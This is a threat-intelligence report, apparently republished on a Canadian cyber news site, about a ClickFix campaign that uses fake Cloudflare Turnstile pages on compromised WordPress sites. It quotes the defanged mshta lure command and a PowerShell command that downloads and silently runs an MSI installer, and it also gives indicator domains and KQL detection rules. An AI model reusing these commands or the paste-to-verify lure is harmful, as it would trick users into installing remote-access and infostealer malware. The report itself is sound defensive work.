Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Debian Incus Important Privilege Escalation Restriction Bypass DSA-6212-1

    April 20, 2026

    2024 Trends in Vulnerability Exploitation | Blog

    April 20, 2026

    ZDI-26-272: ATEN Unizon RpcProvider Missing Authentication Denial-of-Service Vulnerability

    April 20, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»Alerts»Human Verification Required: Copy & Paste Your Malware Here
    Alerts

    Human Verification Required: Copy & Paste Your Malware Here

    adminBy adminApril 19, 2026No Comments7 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    When a user visits a compromised WordPress website, injected code containing a URL triggers a redirection chain that ultimately retrieves a JavaScript payload responsible for rendering the fake Cloudflare Turnstile challenge. An example of the code used to trigger this redirection chain is shown below.

    cti-human-verification-2

    Figure 2 – Example of code injection on compromised WordPress site.

    In most cases, DNS resolution for the injected URL is performed in advance, expediting content delivery and creating a seamless user experience that enhances the perceived legitimacy of the page.

    cti-human-verification-3

    Figure 3 – Example of dns-prefetch used to expedite the delivery of the fake Cloudflare Turnstile.

    The URLs injected into the compromised WordPress sites redirect to the resource that hosts the fake Cloudflare Turnstile JavaScript. As shown in Figure 4, URLs on the domain forfsakencoilddxga[.]com redirect to URLs hosted on caprofklfkzttripwith[.]com.

    cti-human-verification-4

    Figure 4 – Example of redirections to the second-stage URL. The initial URLs are unique to each compromised site, identified by a timestamp in epoch format, likely used for tracking purposes.

    Once the redirection chain is complete, the user is presented with the fake Cloudflare Turnstile page that displays the prompt: “Verify you are human by completing the action below.”, accurately mimicking the appearance and behavior of the legitimate Cloudflare Turnstile service.

    cti-human-verification-5

    Figure 5 – Initial prompt provided by the fake Cloudflare Turnstile challenges.

    The verification will always fail by design, and after two unsuccessful attempts, the user is presented with a prompt claiming there is an issue related to “irregular web activity” that must be resolved by following the provided instructions.

    cti-human-verification-6

    Figure 6 – Subsequent instructions provided to the user following the two failed attempts at verification.

    The instructions direct the user to open the Windows Run dialog and paste in a “Verification Code”, which contains hidden malicious code. If the user uses the built-in copy function, their clipboard is populated with both the visible code and a concealed malicious command. 

    In all cases observed by CyberAlberta Threat Intelligence, the following malicious command (with some variances in the “Verification ID”) is provided to the user.


    mshta hxxps://serviceauthfoap[.]com/ # I am not a robot: Cloudflare Verification ID: 18ZW-GAN 


    If the user opens the Windows Run dialog and pastes the content from the clipboard, the text padding visually obscures the malicious command, making it appear benign.

    cti-human-verification-7

    Figure 7 – Example of what the user would see after pasting the malicious command into the Windows Run dialog.

    The malicious portion of the command is only visible if the user scrolls to the left within the text field.

    cti-human-verification-8

    Figure 8 – Example of the malicious mshta http command that is on the left of the text field.

    Execution 

    Executing this command leverages the legitimate Windows binary mshta (mshta.exe) to establish a network connection to the specified URL. The use of mshta to facilitate connections is a widely used technique, favoured by threat actors for its legitimacy and ability to bypass security controls in the browser. 

    The mshta command observed in this campaign issues a GET request to the second-stage domain (serviceauthfoap[.]com), which, at the time of reporting, launches a further malicious command using PowerShell and hosts an audio player interface, likely intended to serve as a decoy. Pivoting on the HTML elements of this page revealed another domain used for the same purpose (serviceindustrverif[.]com).

    cti-human-verification-9

    Figure 9 – Screenshot of one of the observed second-stage domains.

    The malicious PowerShell command, shown below, prompts an invoke web request (IWR) command to retrieve an installer file named abc.msi, saving it to the user’s C:\Users\Public\ directory, and automatically executes it using the legitimate Windows binary msiexec (msiexec.exe).


    “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -c “iwr hxxps://ownlifeforyouwithme[.]com/plo –OutFile C:\Users\Public\abc.msi; msiexec /i C:\Users\Public\abc.msi /qn” 


    Command and Control (C2)

    The URL embedded in the command (hxxps://ownlifeforyouwithme[.]com/plo) redirects to the final-stage domain (kdfmmikfkafjikmfikfjhm[.]com) which hosts the malicious installer. Pivoting on this domain’s WHOIS record revealed an additional domain used to host related malicious installer files (downlfkzfoqkajada[.]com).  

    A recent report by Chris Campbell, Principal Security Architect at Inde Security, describes activity nearly identical to that observed in the lead-up to the redirection to kdfmmikfkafjikmfikfjhm[.]com. According to the report, the execution of abc.msi facilitates the delivery of the SectopRAT remote access trojan (RAT). Additionally, community comments on VirusTotal linked to this domain suggest that the Lumma infostealer may also be deployed as part of the same attack chain. 

    In the report by Inde Security, it is noted that the malicious installer abc.msi leverages another legitimate Windows binary System Restore Tasks (SrTasks.exe) to establish persistence capable of surviving factory resets. This behavior is illustrated in the process tree shown below.


      └── SrTasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:14 

            └── conhost.exe 0xffffffff -ForceV1 


    Recommendations 

    To prevent compromise from this and similar ClickFix campaigns, consider implementing the following measures: 

    • Block the domains listed in the Indicators of Compromise (IOCs) section below and review logs for any signs of access or activity. 
    • If access to compromised WordPress sites or URLs hosting the fake Cloudflare Turnstile JavaScript payloads is detected, initiate an investigation to identify signs of further compromise, including anomalous clipboard activity or execution of suspicious commands such as mshta http. 
    • If activity involving final-stage domains delivering the malicious installer or any mshta http commands is detected, a thorough investigation and full system scan are recommended to identify any additional payloads. Additionally, investigate affected systems for signs of persistence mechanisms, as described earlier in this report. 
    • Raise organizational awareness of this threat by reviewing related reports outlined in the Further Detail section below and sharing these insights to help mitigate the risk of exploitation. Security teams are encouraged to leverage the Indicators of Compromise provided in these reports. 
    • Ensure all WordPress sites and associated plugins are regularly audited and properly maintained with timely application of security patches. Implement a strong password policy and enforce Multi-Factor Authentication (MFA) to reduce the risk of unauthorized access.

    Detection Opportunities

    Detecting Compromised WordPress Sites

    The following Censys Search query leverages the known domains of the redirect URLs to identify the IPs hosting compromised WordPress sites. 

    host.services.endpoints.http.body: {“pptpooalfkakktl.com”,”forfsakencoilddxga.com”,”tripallmaljok.com”,”pqoqllalll.com”,”overtimeforus.com”} 

    Blocking IP addresses identified as a result of this search will prevent access to compromised WordPress sites redirecting to the identified domains, therefore preventing any exposure to the rest of the attack chain. Leveraging the search can also assist with the rapid identification of newly compromised infrastructure, providing the injected redirect uses one of these domains. However, because many of these IPs are associated with shared hosting environments, blocking them will likely also block legitimate domains, potentially disrupting business operations.  

    For a more precise view of WordPress sites confirmed to be compromised, refer to the Indicators of Compromise section at the end of this report. Alternatively, the following search on URLScan lists compromised WordPress sites that have been identified by CyberAlberta Threat Intelligence and other analysts. 

    domain:pptpooalfkakktl.com OR domain:forfsakencoilddxga.com OR domain:tripallmaljok.com OR domain:pqoqllalll.com OR domain:overtimeforus.com 

    Custom Detection Rules 

    The following custom detection rules (written in KQL) are designed to detect the activity observed in this campaign.


    Detecting use of mshta to perform http connections.

    | where ProcessCommandLine contains “mshta”  

    | where ProcessCommandLine contains “http” 

    | project Timestamp, DeviceId, DeviceName, ActionType, FileName, ProcessCommandLine, AccountDomain, AccountName, InitiatingProcessCommandLine, InitiatingProcessParentFileName 

    | sort by Timestamp desc 


    Detecting SrTasks.exe used for persistence 

    | where InitiatingProcessParentFileName == “msiexec.exe” 

    | where ProcessCommandLine contains @’SrTasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:14′ 

    | project Timestamp, DeviceId, DeviceName, ActionType, FileName, ProcessCommandLine, AccountDomain, AccountName, InitiatingProcessCommandLine, InitiatingProcessParentFileName 

    | sort by Timestamp desc 


    Indicators of Compromise

    Domains for final-stage URLs hosting malicious installers 

    downlfkzfoqkajada[.]com 

    Also hosted fake Cloudflare Turnstile JavaScript in previous clusters 

    kdfmmikfkafjikmfikfjhm[.]com 

    hitiotppppalfkjfk[.]com 

     

    Domain for redirection URLs to malicious installer 

    ownlifeforyouwithme[.]com 

    mfktiaoaolfkfjzjk[.]com 

     

    Domains launching PowerShell commands delivering malicious installers or executables 

    serviceindustrverif[.]com 

    serviceverifcaptcho[.]com 

     

    Domains for redirection URLs to fake Cloudflare Turnstile JavaScript 

    forfsakencoilddxga[.]com 

     

    Domains for URLs hosting the fake Cloudflare Turnstile JavaScript 

    dajajkfifofjfklaiotjapp[.]com 

    caprofklfkzttripwith[.]com 

     

    Domains and URLs of compromised WordPress sites 

    pptpooalfkakktl[.]com URLs 

    flowerdeliverybellgardens[.]com 

    billysfireworks[.]co.uk 

    forfsakencoilddxga[.]com URLs 

    avilasoccer.digitalguider[.]dev 

    citysmilesdental[.]co.uk 

    enhancedyantraenergy[.]digitalguider.dev 

    integrityglobalmgmt[.]com 

    maryland.ccproject[.]com 

    southwesternbrushcontrol[.]ca 

    sulamerica.curitiba[.]br 

    tripallmaljok[.]com URLs 

    bradescosaudenacional[.]com.br 

    host.digiinvention[.]com 

    nationaleyecarerecruiters[.]com 

    showtimedetailingservice[.]com 

    xn–casino-trc-tuyn-cf5h62a[.]net 

    hxxps://digitalmavericksmedia[.]com/ 

    hxxps://esi-texas.com/wp-admin/china 

    hxxps://rioinnovationweek[.]com.br/wp-content/plugins/quick-cache-cleaner/qcc-script[.]js 

    casino-truc–tuyen[.]net 

    pedicabspares[.]digitalguider.dev 

    simplefix1stg[.]wpenginepowered[.]com 

    hxxps://agriculture[.]gov.ly/2020/ 

    hxxps://drsaitozturk[.]com/ro/chirurgia-de-stimulare-a-creierului-profund-dbs/ 

    hxxps://graygraph[.]com/jobs/ 

    hxxps://suprocky[.]com/in-line-fan-vf120/ 

    18.141.56.249[.]sslip.io 

    overtimeforus[.]com URLs 

    anterior2025.sheisforum[.]com 

    capitalhrsolutions[.]net 

    walkerlawfirm.mystagingwebsite[.]com 

    xlncautobeautyca[.]digitalguider.dev 

    hxxps://bungkuskawkaw[.]com/about-us/ 

    Further Detail



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleFrom phishing to fallout — Why MSPs must rethink both security and recovery
    Next Article CVE-2026-6597 | THREATINT
    admin
    • Website

    Related Posts

    Alerts

    Debian Incus Important Privilege Escalation Restriction Bypass DSA-6212-1

    April 20, 2026
    Alerts

    ZDI-26-272: ATEN Unizon RpcProvider Missing Authentication Denial-of-Service Vulnerability

    April 20, 2026
    Alerts

    ZDI-26-282: GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

    April 20, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202620 Views

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202620 Views

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views
    Our Picks

    Debian Incus Important Privilege Escalation Restriction Bypass DSA-6212-1

    April 20, 2026

    2024 Trends in Vulnerability Exploitation | Blog

    April 20, 2026

    ZDI-26-272: ATEN Unizon RpcProvider Missing Authentication Denial-of-Service Vulnerability

    April 20, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.